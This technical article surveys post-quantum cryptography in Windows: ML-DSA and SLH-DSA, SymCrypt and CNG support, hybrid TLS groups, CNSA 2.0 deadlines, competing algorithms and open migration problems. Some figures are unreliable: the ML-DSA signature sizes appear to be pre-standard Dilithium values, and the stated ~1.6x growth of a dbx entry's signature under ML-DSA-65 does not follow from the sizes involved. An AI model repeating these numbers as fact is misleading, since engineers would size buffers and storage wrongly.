ML-DSA-87's 4595-byte signature is the bottom-of-stack constraint that drives every TPM and Pluton roadmap [@fips-204-pdf]. The default TPM 2.0 command and response buffers, fixed by historical compatibility decisions, are 4096 bytes. ML-DSA-65's 3293-byte signature fits; ML-DSA-87's 4595-byte signature does not. The TCG TPM 2.0 Library Specification v1.85 (March 2026) introduces a streaming Sign/Verify family and ML-KEM Encapsulate/Decapsulate opcodes that resolve the overflow; the full opcode inventory and the new TPM2B_KEM_CIPHERTEXT / TPM2B_SHARED_SECRET / TPM_ST_MESSAGE_VERIFIED structures are catalogued in Section 9.1 [@wolfssl-wolftpm-v185]. Until v1.85 chips ship in retail volume, ML-DSA-87 cannot live on a commodity TPM. Cross-reference the TPM and Pluton sibling articles for the silicon-side mechanics.Pluton's firmware-update agility -- the firmware ships through the existing Microsoft Update channel -- is the reason Pluton can move on PQ adoption faster than discrete TPM 2.0 chips, whose firmware updates depend on each TPM vendor's release cadence. The cross-reference to the Pluton sibling article in this series spells out the firmware-update mechanism in detail [@ms-quantum-safe-blog].

The CNG surface mirrors ML-KEM's idiom with the signature primitives. BCryptOpenAlgorithmProvider with BCRYPT_MLDSA_ALGORITHM = L"ML-DSA" and MS_PRIMITIVE_PROVIDER returns a handle; BCryptSetProperty selects BCRYPT_MLDSA_PARAMETER_SET_44, _65, or _87; BCryptGenerateKeyPair plus BCryptFinalizeKeyPair produces the keypair; key blobs are BCRYPT_PQDSA_PUBLIC_KEY_BLOB and BCRYPT_PQDSA_PRIVATE_KEY_BLOB; signing and verification go through BCryptSignHash and BCryptVerifySignature with a BCRYPT_PQDSA_PADDING_INFO struct that selects pure-mode or pre-hash-mode (External-Mu, per FIPS 204's HashML-DSA variants) and carries an optional context string [@cng-mldsa-examples].

{// Illustrative ML-DSA signing. // Constants gamma1, gamma2, beta are parameter-set dependent. function mlDsaSign(message: Uint8Array, sk: SecretKey): Signature { const { A, s1, s2, t0 } = sk; let attempt = 0; while (attempt < 1000) { attempt++; const y = sampleMaskingVector(gamma1); // y in R_q^l, ||y||_inf < gamma1 const w = ringMatVecMul(A, y); // w = A*y in R_q^k const w1 = highBits(w, 2 * gamma2); const c = hashToChallenge(message, w1); // c in B_tau const z = addVec(y, scalarMul(c, s1)); // z = y + c*s1 if (infNorm(z) >= gamma1 - beta) continue; // reject if response too large const r0 = lowBits(subVec(w, scalarMul(c, s2)), 2 * gamma2); if (infNorm(r0) >= gamma2 - beta) continue; // reject if low bits leak return { z, c, h: makeHint(t0, c, w) }; } throw new Error("ML-DSA signing exceeded attempt budget (statistically improbable)"); }}

ML-DSA sign time on x86-64 is in the low single-digit milliseconds; verify time is in the hundreds of microseconds. The rejection-sampling loop creates a measurable variance in sign-time -- a side channel that secret-key recovery exploits if the loop count, branch, or memory-access pattern leak.

5.3 SLH-DSA (FIPS 205) -- the conservative hash-based signature

SLH-DSA's security rests on hash-function security alone. No lattice. No code. No multivariate. No isogeny. Just preimage resistance and collision resistance of an underlying hash function (SHA-2 or SHAKE). If every algebraic post-quantum assumption breaks tomorrow, hash-based signatures still hold. The cost is signature size and signing time [@fips-205-pdf].

The construction is a hypertree -- a tree of XMSS subtrees, with WOTS+ (Winternitz One-Time Signature Plus) leaves at each subtree level, and FORS (Forest of Random Subsets) few-time signatures at the bottom layer signing the actual message. The hypertree is sampled fresh per signature via a pseudorandom function of the message, which is what makes SPHINCS+ -> SLH-DSA stateless. Unlike LMS or XMSS, which require the signer to track a counter (because re-using a one-time key reveals the secret), SLH-DSA derives the leaf address from the message hash and a per-signature randomness; no signer state survives between signatures.

A one-time signature scheme. The signer publishes a public key consisting of hash-chain endpoints; the private key is the chain starts. Signing reveals intermediate chain values that depend on the message digest. A WOTS+ key signs exactly one message; signing a second message with the same key reveals enough chain values to forge any signature. WOTS+ is the leaf primitive of XMSS and SLH-DSA [@fips-205-pdf]. A few-time signature scheme built from $k$ independent hash trees of depth $t$. To sign a message, the signer hashes the message to obtain $k$ leaf indices and reveals the leaf preimage plus authentication path in each tree. Signing many messages with the same FORS key eventually reveals enough leaves to forge, but the few-times threshold is high enough to be tolerable when FORS is the bottom layer of an SLH-DSA hypertree whose root is signed by the layer above [@fips-205-pdf]. flowchart TD Root["SLH-DSA public key = root of top XMSS tree (32-64 bytes)"] Root --> T1["Top XMSS subtree (WOTS+ leaves)"] T1 --> T2["Middle XMSS subtrees (WOTS+ leaves)"] T2 --> T3["More XMSS layers (parameter d controls depth)"] T3 --> Bot["Bottom XMSS subtree"] Bot --> FORS["FORS forest (k trees of depth t)"] FORS --> Msg["Message digest derived from per-signature randomness"]

Twelve parameter sets ship in FIPS 205: every combination of {SHA2, SHAKE} × {128s, 128f, 192s, 192f, 256s, 256f} where s is "small signature, slow signing" and f is "fast signing, larger signature" [@fips-205-pdf]. Public keys are 32-64 bytes; signatures range from 7,856 bytes (SLH-DSA-SHA2-128s) to 49,856 bytes (SLH-DSA-SHA2-256f). Signing time ranges from ~10 ms (SLH-DSA-SHA2-128f) to several hundred milliseconds at the high end. The use case is code signing: sign once, verify a billion times. CNG plans BCRYPT_SLHDSA_ALGORITHM with the same BCRYPT_PQDSA_KEY_BLOB and BCRYPT_PQDSA_PADDING_INFO plumbing as ML-DSA [@cng-algorithm-ids].

Key idea: ML-KEM is the only NIST-finalised KEM. ML-DSA is the general-purpose lattice signature. SLH-DSA is the conservative hash-based fallback. They are not interchangeable; an engineer picks one (or all three) per use case. Hybrid TLS key agreement uses ML-KEM-768; X.509 end-entity signatures use ML-DSA-65 or ML-DSA-87; long-lived code signing where signature size is tolerable uses SLH-DSA; firmware signing with build-counter discipline uses LMS or XMSS.

All three algorithms are FIPS-standardised. All three have CNG identifiers in Insider Canary builds. But until SymCrypt ships them, until Schannel negotiates them, until AD CS issues certificates that carry them, none of this exists for the Windows engineer in production. So what does Microsoft actually ship in May 2026?

6. State of the Art -- What Windows Ships in May 2026

Algorithms are not products. Microsoft ships SymCrypt, CNG, NCrypt, Schannel, .NET, AD CS, CertEnroll, and Authenticode -- and post-quantum cryptography arrives in each surface on its own clock.

SymCrypt -- the FIPS-validated foundation

SymCrypt is Microsoft's primary cryptographic library. The repository description states it directly: "SymCrypt is the core cryptographic function library currently used by Windows ... started in late 2006 with the first sources committed in Feb 2007 ... Since the 1703 release of Windows 10, SymCrypt has been the primary crypto library for all algorithms in Windows" [@symcrypt-repo]. Microsoft open-sourced SymCrypt in March 2019 [@symcrypt-repo]. It is the FIPS 140-validated module that backs CNG; if CNG ships a post-quantum algorithm on Windows, SymCrypt is the implementation underneath.

Microsoft's open-source cryptographic library, used by Windows, Azure Linux, Xbox, and other Microsoft platforms. SymCrypt has been Windows's primary cryptographic library since Windows 10 1703 (April 2017); its FIPS 140-validated module is the implementation backing CNG (the Win32 API surface) and the NCrypt KSP infrastructure (the key-storage-provider surface). SymCrypt is currently written predominantly in cross-platform C, with an in-progress Rust rewrite for memory-safety reasons [@symcrypt-repo, @ms-research-symcrypt-rust].

The SymCrypt release history through May 2026 is verbatim from the public CHANGELOG [@symcrypt-changelog].

Version	Post-quantum change
103.5.0	Add ML-KEM per final FIPS 203; add XMSS / XMSS^MT
103.6.0	Add LMS implementation
103.7.0	Add ML-DSA implementation
103.8.0	Add FIPS approved-services indicator
103.9.0	Add ML-DSA Sign / Verify with External Mu
103.9.1	Add FIPS CAST for ML-DSA, plus ML-KEM and ML-DSA keygen pairwise-consistency tests
103.11.0	Add Composite ML-KEM implementation

The SymCrypt releases page lists the binary artefacts at each version for Windows AMD64/ARM64, generic Linux AMD64/ARM64, and OpenEnclave AMD64 [@symcrypt-releases]. Microsoft has also begun rewriting SymCrypt in Rust; the Microsoft Research blog post describes the rationale (memory safety in a TCB-grade library) and confirms the algorithm coverage includes "AES-GCM, SHA, ECDSA, and the more recent post-quantum algorithms ML-KEM and ML-DSA" [@ms-research-symcrypt-rust].

CNG, NCrypt, and .NET 10

The Windows Insider Canary channel introduced post-quantum CNG identifiers in May 2025 [@ms-pqc-windows-insider]. The new pseudo-handle BCRYPT_MLKEM_ALG_HANDLE, the algorithm-name strings BCRYPT_MLKEM_ALGORITHM = L"ML-KEM" and BCRYPT_MLDSA_ALGORITHM = L"ML-DSA", the prerelease BCRYPT_SLHDSA_ALGORITHM, and the existing BCRYPT_LMS_ALGORITHM are documented on the CNG Algorithm Identifiers page [@cng-algorithm-ids]. NCrypt KSPs expose the same algorithm names; an application that previously called NCryptCreatePersistedKey against an RSA KSP can do the equivalent against an ML-KEM KSP with no plumbing changes beyond the algorithm identifier and parameter set.

.NET 10 (GA November 2025) exposes the managed surface [@dotnet-10-launch]. System.Security.Cryptography.MLKem is an abstract base class with KeyGen, Encapsulate, Decapsulate, ExportEncapsulationKey, and ImportEncapsulationKey instance methods [@dotnet-mlkem]. MLKemCng is the CNG-backed concrete subclass that forwards to SymCrypt via CNG [@dotnet-mlkemcng]. Equivalent MLDsa / MLDsaCng and SlhDsa / SlhDsaCng pairs cover the signature primitives. The *Cng subclasses are sealed; the abstract base classes are subclassable for non-CNG implementations.

Schannel hybrid TLS 1.3

Schannel is the Windows TLS stack. The hybrid TLS 1.3 Supported Groups are defined by IETF draft-ietf-tls-ecdhe-mlkem-04 (8 February 2026) [@draft-tls-ecdhe-mlkem]:

Group	Codepoint	Construction
`X25519MLKEM768`	0x11EC	RFC 7748 X25519 plus ML-KEM-768
`SecP256r1MLKEM768`	0x11EB	NIST P-256 plus ML-KEM-768
`SecP384r1MLKEM1024`	0x11ED	NIST P-384 plus ML-KEM-1024

The IANA TLS Parameters registry lists all three (registry last updated 2026-04-29) [@iana-tls-parameters]. Schannel preview on 24H2 and Server 2025 gates these behind Group Policy in early 2026; default-on is the May 2026 -> November 2026 milestone per Microsoft's Quantum-Safe Security blog [@ms-quantum-safe-blog]. The actual TLS key schedule combines the two shared secrets with a concatenation combiner: $\text{HKDF-Extract}(\text{salt} = 0, \text{IKM} = K_{\text{ecdh}} | K_{\text{pq}})$, per draft-ietf-tls-hybrid-design-16 [@draft-tls-hybrid]. The combiner is correct as long as either component is unbroken; an adversary breaking only ECDH cannot recover the session key, nor can one who breaks only ML-KEM.

AD CS, CertEnroll, and Azure Key Vault

The X.509 side of the migration lags TLS by a year. Active Directory Certificate Services supports ML-DSA certificate templates via the CertEnroll API, conditional on a CSP or KSP exposing BCRYPT_MLDSA_ALGORITHM. The practical migration mechanism is composite signatures per draft-ietf-lamps-pq-composite-sigs-19 (21 April 2026), which combines ML-DSA with RSA-PKCS#1-v1.5, RSA-PSS, ECDSA, Ed25519, or Ed448 in a single SubjectPublicKeyInfo and requires both components to verify [@draft-lamps-composite]. Downlevel verifiers that do not recognise the composite OID can still validate the inner classical chain; uplevel verifiers validate both. Pure post-quantum X.509 chains are in preview for closed pilots, not in general use. Azure Key Vault's managed-HSM exposes post-quantum keys in preview for Q1 2026.

flowchart TD ISV["ISV applications (browsers, services, SDKs)"] Schannel["Schannel (TLS 1.3 with X25519MLKEM768)"] ADCS["AD CS / CertEnroll (ML-DSA, composite signatures)"] DotNet[".NET 10 (MLKem, MLDsa, SlhDsa managed types)"] KSP["NCrypt KSPs (Microsoft Software KSP, Pluton KSP, vendor KSPs)"] CNG["CNG Win32 API (BCryptEncapsulate, BCryptSignHash, ...)"] SymCrypt["SymCrypt (FIPS-validated, primary crypto library since Win10 1703)"] HW["Hardware (CPU AES-NI, Pluton, TPM 2.0, IOMMU)"] ISV --> Schannel ISV --> ADCS ISV --> DotNet Schannel --> CNG ADCS --> CNG DotNet --> CNG Schannel --> KSP KSP --> CNG CNG --> SymCrypt SymCrypt --> HW

What is NOT shipping in May 2026

The honest accounting matters. Several load-bearing Windows surfaces have no post-quantum path as of May 2026.

Note: The post-quantum migration is partial. As of May 2026, none of the following has a published Microsoft post-quantum specification or shipping implementation: IKEv2 PQ key exchange; SMB hybrid (X25519MLKEM768 over SMB 3.1.1); RDP hybrid; BitLocker network unlock (still RSA-2048 + AES-256); Kerberos PKINIT (no PQ certificate path for the KDC bootstrap); Windows Hello attestation (TPM-bound RSA-2048 / ECDSA-P256). Authenticode signatures on drivers and binaries remain RSA-2048 + SHA-256 with no published PQ Authenticode specification. Premature migration of these surfaces is worse than no migration, because there is no downlevel-compatible composite story for them. The discipline is: hybrid TLS first, composite X.509 chain second, firmware signing pilot third. Leave the rest alone until Microsoft publishes specifications [@ms-quantum-safe-blog].

CNSA 2.0 -- the policy clock

CNSA 2.0 turns the technical timeline into an acquisition mandate. The four authoritative dates from the May 30, 2025 revision of the Cybersecurity Advisory [@cnsa20-csa]:

Milestone	Date
Acquisition preference for PQ in new National Security Systems	January 1, 2027
Legacy algorithm phase-out begins	December 31, 2030
Mandatory PQ adoption in National Security Systems	December 31, 2031
RSA / ECDSA disallowed in National Security Systems	After 2035

The U.S. National Security Agency's Commercial National Security Algorithm Suite 2.0, announced September 7, 2022 [@nsa-cnsa-news]. CNSA 2.0 mandates post-quantum algorithms for U.S. National Security Systems by 2031 and disallows RSA / ECDSA after 2035. Specific algorithm selections (May 30, 2025 revision): ML-KEM-1024 for key establishment, ML-DSA-87 for general signing, LMS and XMSS for firmware signing, AES-256 for symmetric encryption, SHA-384 for hashing [@cnsa20-csa]. The CNSA 2.0 dates drive every U.S. vendor's PQC roadmap including Microsoft's. A FIPS 140-3 validation is a Cryptographic Module Validation Program certificate that asserts a cryptographic module (a binary, with a specific version, a specific build, and a specific tested configuration) implements specific algorithms correctly and has been tested by an accredited lab. SymCrypt's FIPS validation is what makes CNG-backed cryptography acceptable for U.S. federal procurement; without validation, the same algorithm implemented in the same byte-exact code is not FIPS-validated. The cadence matters because algorithm-implementation cadence (new ML-DSA External-Mu support in v103.9.0) and module-validation cadence (a new CMVP certificate per validated build) are different clocks. SymCrypt v103.8.0 explicitly added a FIPS approved-services indicator [@symcrypt-changelog] -- the runtime hook by which an application can ask "am I operating in FIPS-validated mode?" and reject non-FIPS algorithms accordingly. CMVP queue times in 2026 are running 9-18 months, which means the published SymCrypt version is typically two or three versions ahead of the FIPS-validated version at any given moment.

ML-KEM is the only NIST-finalised KEM. ML-DSA and SLH-DSA are the only NIST-finalised signature schemes. But the NIST portfolio still has Falcon in FIPS 206 draft, HQC for code-based diversification, LMS / XMSS for firmware -- and the IETF still has composite signatures and hybrid TLS layered on top. What else is shipping, and why?

7. Competing Approaches -- Inside the Lattice Lane and Outside It

ML-KEM is the only KEM in FIPS 203, but it is not the only KEM in the portfolio. Several other algorithms compete for adjacent niches, and the engineer who treats "PQ" as one thing misses the architectural choices that CNSA 2.0 and NIST actually make.

Falcon (FN-DSA, FIPS 206 draft). NTRU-lattice signatures with fast Fourier sampling. Signature sizes range from 666 bytes (Falcon-512, category 1) to 1280 bytes (Falcon-1024, category 5) -- three to five times smaller than ML-DSA-65 at comparable security; the byte counts are verbatim from the Falcon Round-3 specification's recommended-parameters table [@falcon-spec]. The cost is Falcon's Gaussian sampler, which requires floating-point arithmetic and is notoriously hard to make constant-time. Microsoft has signalled support; SymCrypt has not shipped Falcon as of May 2026. FIPS 206 finalisation is the precondition; NIST's pqc-dig-sig project page lists Falcon (renamed FN-DSA) as the standard whose finalisation has been pushed past initial timelines pending the constant-time sampler question [@nist-pqc-dig-sig].

HQC (Hamming Quasi-Cyclic). NIST selected HQC as the fourth-round standardisation choice on 7 March 2025 [@nist-hqc-news]. HQC is code-based -- its security rests on the hardness of decoding random quasi-cyclic codes -- which is structurally unrelated to lattice cryptography. NIST IR 8545 documents the rationale: HQC offers diversification away from lattices in case future cryptanalysis makes Module-LWE less conservative than it now appears. HQC was chosen over BIKE; Classic McEliece remains a candidate but was not selected because of key size. NIST is expected to publish the HQC standard around 2027.

Classic McEliece. ~1 MB public keys at NIST category 5; ~261 KB at category 1 [@mceliece-project]. Forty-eight years of cryptanalysis without a structural break. Not selected by NIST for general standardisation. Survives as a niche choice for long-term archival key wrapping, where the key transfer happens once and the ciphertext is small.

LMS, XMSS, XMSS^MT (stateful hash-based, NIST SP 800-208). Already in SymCrypt. The NIST SP 800-208 specification names "two algorithms ... stateful hash-based signature schemes: the Leighton-Micali Signature (LMS) system and the eXtended Merkle Signature Scheme (XMSS), along with their multi-tree variants (HSS and XMSS_MT)" [@nist-sp-800-208]. CNSA 2.0 specifies LMS and XMSS for firmware signing: UEFI capsule signing, OEM driver signing, secure-boot dbx revocation entries [@cnsa20-csa]. The stateful-counter requirement -- the signer must track a build counter and never reuse a leaf index -- is acceptable in build pipelines that already track build numbers monotonically. SymCrypt v103.5.0 added XMSS and XMSS^MT; v103.6.0 added LMS [@symcrypt-changelog].

Note: CNSA 2.0 names stateful hash-based signatures for firmware signing and only firmware signing. The reason is operational. LMS and XMSS are state-leaking: signing twice with the same leaf index reveals the secret. A general-purpose signing surface (X.509 end-entity certificates, code signing for arbitrary developers, document signing) cannot guarantee state discipline. A firmware-build pipeline that issues build numbers monotonically and operates under hardware-security-module discipline can. The narrow scope is what makes LMS / XMSS safe to deploy now -- the stateless SLH-DSA story is the general-purpose alternative for everything that cannot guarantee counter discipline [@cnsa20-csa, @nist-sp-800-208].

Composite signatures. draft-ietf-lamps-pq-composite-sigs-19 (21 April 2026) defines combinations of ML-DSA with each of RSA-PKCS#1-v1.5, RSA-PSS, ECDSA, Ed25519, and Ed448 [@draft-lamps-composite]. The X.509 SubjectPublicKeyInfo contains both component public keys; verification requires both component signatures to succeed; an attacker must break both algorithms. Composite is the load-bearing migration mechanism for 2026-2030, because it is deployable against today's PKI. Downlevel verifiers ignore the composite OID and trust the inner classical chain; uplevel verifiers validate both.

A signature construction that combines two component signature algorithms -- one classical, one post-quantum -- such that both signatures must verify for the composite signature to validate. The composite public key is the concatenation of the two component public keys plus a composite-OID wrapper; the composite signature is the concatenation of the two component signatures. The construction provides "either-component" security: an adversary must break both algorithms to forge. Composite is the practical migration on-ramp for X.509 PKI during 2026-2030 [@draft-lamps-composite].

Hybrid TLS X25519MLKEM768. Already in production at internet scale. Cloudflare since October 2022; Apple iMessage PQ3 since February 2024; Signal PQXDH since September 2023 [@signal-pqxdh]; OpenSSH since version 9.0 (April 2022) via sntrup761x25519-sha512 (Streamlined NTRU Prime + X25519) [@openssh-9-0], with the ML-KEM-768-based group mlkem768x25519-sha256 added in OpenSSH 9.9 (September 2024) [@openssh-9-9]; Google Chrome; Microsoft Edge. Schannel preview on 24H2 and Server 2025 in early 2026 [@cloudflare-pq-for-all, @cloudflare-pq-2024, @apple-imessage-pq3].Apple's framing of PQ3 as "Level 3" is the policy-marketing achievement of the post-quantum era. Level 1 is no post-quantum; Level 2 is post-quantum key establishment for the initial handshake; Level 3 is post-quantum key establishment for both the initial handshake and ongoing message-key ratcheting. iMessage PQ3 reached Level 3 in February 2024 -- six months before ML-KEM was even FIPS-finalised. The companion symbolic-analysis PDF Apple commissioned confirms the parameter split: ML-KEM-1024 for the initial key exchange, Kyber-768 for the ongoing ratchet [@apple-imessage-pq3].

A key-exchange construction that combines a classical key-agreement algorithm (X25519, ECDH-P256, RSA) with a post-quantum KEM (ML-KEM-768) in such a way that the final shared secret depends on both components. An adversary who breaks either component but not both learns nothing. The most common combiner is HKDF-Extract over the concatenation of the two shared secrets, per `draft-ietf-tls-hybrid-design-16` [@draft-tls-hybrid]. Hybrid is the migration choice during the period when neither classical nor post-quantum primitives can be trusted standalone -- classical because of harvest-now-decrypt-later, post-quantum because of the narrower cryptanalytic margin (see Section 8).

Compact portfolio comparison for the KEM side (HQC sizes are current Round-4 parameters from the HQC project specification [@hqc-project]):

Algorithm	Public key	Ciphertext	Hardness	NIST status	Microsoft adoption
ML-KEM-768	1184 B	1088 B	Module-LWE	FIPS 203	SymCrypt 103.5.0; CNG; Schannel hybrid
HQC-1	2241 B (cat 1)	4433 B (cat 1)	Quasi-cyclic codes	Round-4 selected (March 2025)	Not yet in SymCrypt
Classic McEliece	~261 KB to ~1 MB	~128 B to ~240 B	Goppa codes	Round-4 niche	Not in SymCrypt
Hybrid X25519+MLKEM768	1216 B	1120 B	X25519 OR Module-LWE	TLS 1.3 IETF draft	Schannel preview, default-on roadmap

Signature side:

Algorithm	Public key	Signature	Hardness	NIST status	Microsoft adoption
ML-DSA-65	1952 B	3293 B	Module-LWE / Module-SIS	FIPS 204	SymCrypt 103.7.0; CNG
Falcon-512	897 B	666 B [@falcon-spec]	NTRU lattices	FIPS 206 draft	Not in SymCrypt
SLH-DSA-SHA2-128f	32 B	17088 B	SHA-2 collision resistance	FIPS 205	Planned `BCRYPT_SLHDSA_ALGORITHM`
LMS / HSS	60 B	4-50 KB	Hash preimage	NIST SP 800-208	SymCrypt 103.6.0
Composite ML-DSA-65 + ECDSA-P256	~2 KB	~3.4 KB	ML-DSA AND ECDSA	LAMPS draft-19	AD CS pilot path

The portfolio works as long as one of its families holds. But what if it doesn't? What does cryptography not tell us about the future, and what are the structural limits of even the strongest post-quantum primitive?

8. Theoretical Limits -- What PQC Does and Does Not Solve

Post-quantum cryptography is not magic. It closes one specific channel of one specific threat model, and engineers who treat it as "now we're quantum-safe" miss the four limits the cryptographers themselves keep flagging.

1. The cryptanalysis margin is narrower than for RSA or ECDH. The best classical algorithm for solving Module-LWE at NIST parameter sizes (BKZ with sieving) runs in roughly $2^{0.292 n}$ operations, where $n$ is the lattice dimension; the best quantum variant runs in roughly $2^{0.257 n}$. That is a 12% exponent reduction -- not a Shor-style polynomial-time collapse. NIST parameter sizes carry a small but measurable margin to absorb future BKZ-with-sieving improvements. The hardness conjecture is stronger than RSA's (worst-case-to-average-case reduction), but the cryptanalytic frontier is thinner. Lattice cryptanalysis has improved continuously since Ajtai 1996; whether the asymptotic exponent further drops in the next decade is an open problem [@regev-2005, @langlois-stehle-modulelwe].

2. The side-channel surface is larger. ML-DSA's rejection-sampling loop is secret-correlated; Falcon's Gaussian sampler requires floating-point arithmetic; ML-KEM's polynomial operations can leak through cache-timing channels. The most visceral example is KyberSlash (eprint 2024/1049, advisory GHSA-x5j2-g63m-f8g4), in which Bernstein and collaborators demonstrated that the official Kyber reference implementation contained a secret-dependent division-timing leak that survived multiple rounds of NIST review and recovered secret keys in minutes on a Raspberry Pi 2 [@kyberslash-2024].KyberSlash is the most important data point in PQC implementation security. The leak was a one-line / operator that compiled to a variable-time integer division on ARM and on older x86-64. The vulnerability survived years of formal NIST review, multiple academic implementations, and several vendor ports. Constant-time discipline is more fragile in PQ primitives than in classical primitives -- both because the algorithms are newer and because the ring arithmetic offers many more variable-time corners than the simpler scalar arithmetic of ECDH or RSA. The KyberSlash site, authored by Bernstein, documents specific implementations affected [@kyberslash-2024].

3. The signed-binary harvest is not closed by PQ. This is the article's third aha moment, and the one most readers miss. A 2026 Authenticode signature on a 2026 Windows driver uses RSA-2048 + SHA-256. In 2035, the verifier may no longer trust RSA-2048 -- but the binary has already been loaded by every machine that downloaded it. Authenticode is not a transport channel. There is no migration-window analogue of harvest-now-decrypt-later because the signature was already validated at load time. The threat model is "an adversary in 2035 forges a new signature on a new binary," not "an adversary in 2035 decrypts a 2026 conversation." The two threat models call for different migration disciplines.

Key idea: Post-quantum cryptography closes the harvest-now-decrypt-later channel for transport-protected traffic (TLS, IPsec, SSH, iMessage). It does not close the signed-binary persistence channel; a 2035 quantum-forged signature on a 2035 driver is a new attack, not a retroactive decryption of a 2026 signature. It does not close the algorithm-agility gap; CNG ships per-algorithm identifiers, not per-algorithm-class. Plan migration accordingly. Hybrid TLS first; composite X.509 chain second; firmware signing pilot third. Authenticode and PKINIT can wait for Microsoft's published specifications -- and premature migration in those surfaces is worse than no migration.

4. The algorithm-agility problem persists. Microsoft has shipped CNG identifiers per algorithm (BCRYPT_MLKEM_ALGORITHM, BCRYPT_MLDSA_ALGORITHM) rather than per algorithm-class (a hypothetical BCRYPT_PQ_KEM_ALGORITHM that selected the underlying primitive at runtime). The IETF treats algorithm agility as a load-bearing concern in draft-ietf-pquip-pqc-engineers-14 (26 August 2025), the IETF informational document on engineering PQC into existing protocol surfaces [@draft-pquip-engineers]. CNG does not yet treat it as load-bearing; the engineering consequences for the next migration are discussed in Section 9.4.

The property of a cryptographic protocol or library that lets the underlying algorithm change without changing the protocol or API surface. A protocol that names "AES-256-GCM" instead of "an AEAD with at least 128-bit security" has poor algorithm agility; replacing AES-256-GCM with ChaCha20-Poly1305 requires the entire protocol to be re-negotiated. CNG's `BCRYPT_MLKEM_ALGORITHM` is per-algorithm rather than per-algorithm-class; a future Round-5 KEM will require new CNG plumbing rather than a parameter change. The IETF `pqc-engineers` document treats algorithm agility as the load-bearing engineering concern for the post-2030 migration window [@draft-pquip-engineers]. A common confusion is the simultaneous truth that lattice cryptography has a *stronger* hardness argument than RSA (the worst-case-to-average-case reduction) and a *narrower* cryptanalytic margin (the 12% exponent gap). Both are true. The strength claim is structural: every average-case Module-LWE instance is hard if any worst-case lattice instance is hard. The narrowness claim is empirical: the best known algorithm is closer to a feasibility threshold than the best known algorithm for factoring or for elliptic-curve discrete log. The conservative McEliece line trades the strength claim (no analogous reduction) for an even wider empirical margin (no progress on Goppa-code decoding in 48 years). Engineers who treat "stronger hardness" and "wider margin" as synonyms get the post-quantum picture backwards. The honest framing: lattice is the deployable post-quantum, McEliece is the conservative fallback, and the portfolio exists because no one assumption carries everything.

These four limits are not bugs; they are structural. But they are not the only open problems. What is the cryptographer's current research frontier, and where will the next migration begin?

9. Open Problems -- Where the Active Research Is

What does Microsoft, NIST, and the IETF still not know? Five open problems whose resolution will define the next decade of Windows cryptography.

9.1 TPM 2.0 and Pluton blob-size constraints

Default MAX_COMMAND_SIZE and MAX_RESPONSE_SIZE on TPM 2.0 are 4096 bytes. ML-DSA-87 signatures (4595 bytes) overflow the response buffer; ML-DSA-65 (3293 bytes) fits. NV memory budgets on commodity TPMs are tightly constrained, which means storing a single ML-DSA-87 keypair (2592-byte public key plus a multi-kilobyte private state) consumes a meaningful fraction of the available NV slot space [@wolfssl-wolftpm-v185, @fips-204-pdf]. The TCG TPM 2.0 Library Specification v1.85 (March 2026) introduces the streaming command family that resolves the buffer overflow; the cited wolfSSL secondary source enumerates the new commands verbatim as TPM2_SignSequenceStart / TPM2_VerifySequenceStart, TPM2_SignSequenceComplete / TPM2_VerifySequenceComplete, and TPM2_SignDigest / TPM2_VerifyDigestSignature for digest-mode operations, plus TPM2_Encapsulate and TPM2_Decapsulate for ML-KEM, with the new structures TPM2B_KEM_CIPHERTEXT, TPM2B_SHARED_SECRET, and TPM_ST_MESSAGE_VERIFIED (the matching *SequenceUpdate opcode is implied by analogy with the existing TPM 2.0 hash-sequence command family but is not enumerated in the available secondary source pending TCG primary access) [@wolfssl-wolftpm-v185]. Commodity v1.85-capable chips are entering early sampling in 2026; Pluton's Rust firmware can move faster but is locked to specific SoC generations.Pluton's SoC-generation locking is the structural cost of its update-channel advantage. The Microsoft Learn Pluton page enumerates the currently supported families (AMD Ryzen 6000, 7000, 8000, 9000, and Ryzen AI Series; Intel Core Ultra 200V Series, Ultra Series 3, and (non-Ultra) Series 3 processors; Qualcomm Snapdragon 8cx Gen 3 and Snapdragon X Series) [@pluton-microsoft-learn]; OEMs without those silicon options cannot ship Pluton-backed PQC even when the firmware-update mechanism is ready. The cross-reference to the Pluton sibling article spells out the silicon-side mechanics.

9.2 Kerberos PKINIT

RFC 4556's certificate-of-the-KDC bootstrap currently uses RSA-OAEP or pre-shared-secret-via-ECDH for AS-REP key establishment. The KDC certificate could be composite-ML-DSA-signed, but the AS-REP encryption key derivation has no IETF post-quantum migration draft as of May 2026. Every Windows domain join, every smart-card logon, every Kerberos-authenticated SMB or RDP or IIS session depends on PKINIT -- and PKINIT has no PQ path. The NTLM-to-PKINIT migration (the subject of a sibling article on NTLM deprecation) was hard enough; the PKINIT-to-PQ-PKINIT migration has not started.

9.3 Authenticode and the EFI signature database

A Windows machine that boots in 2035 must verify boot loaders signed between 2010 and 2035. The EFI signature-database revocation list (dbx) is roughly 32 KB on commodity platforms [@uefi-dbx]. Replacing each entry's RSA-2048 signature with ML-DSA-65 multiplies the per-entry signature size by ~1.6×; with SLH-DSA-SHA2-128f, by ~50×. No public Microsoft Secure Boot post-quantum roadmap exists as of May 2026. LMS is the obvious candidate -- CNSA 2.0 mandates LMS or XMSS for firmware signing -- but the dbx-size question remains open. Cross-reference the Secure Boot sibling article in this series.

9.4 Algorithm agility as a separately engineered property

Section 8 limit-4 introduced algorithm agility as a structural property the IETF treats as load-bearing [@draft-pquip-engineers]. The open engineering problem is the CNG provider-interface design. Today every consumer -- Schannel, AD CS, IKEv2, SMB, RDP, Authenticode -- is wired to a specific algorithm identifier (BCRYPT_MLKEM_ALGORITHM, BCRYPT_MLDSA_ALGORITHM). A future migration to a NIST Round-5 KEM has to re-do every one of those wiring points, the same shape of problem CNG had with the RSA-to-ECDSA transition. Solving algorithm agility means redesigning the CNG provider interface around algorithm families rather than algorithm names -- a multi-year engineering programme that nobody has publicly committed to, and that the post-2030 migration window depends on.

9.5 The PKI rebuild before 2035

Every TLS server certificate, every code-signing certificate, every smart-card user certificate has to be re-issued in a post-quantum algorithm before the legacy algorithm is disallowed. The throughput of the global public-CA system is the limiting factor. Commercial CAs are pilot-issuing composite-signed roots in 2026; volume issuance lags by years. NIST IR 8547 (12 November 2024) proposes deprecating quantum-vulnerable algorithms in NIST standards by 2035 [@nist-ir-8547].

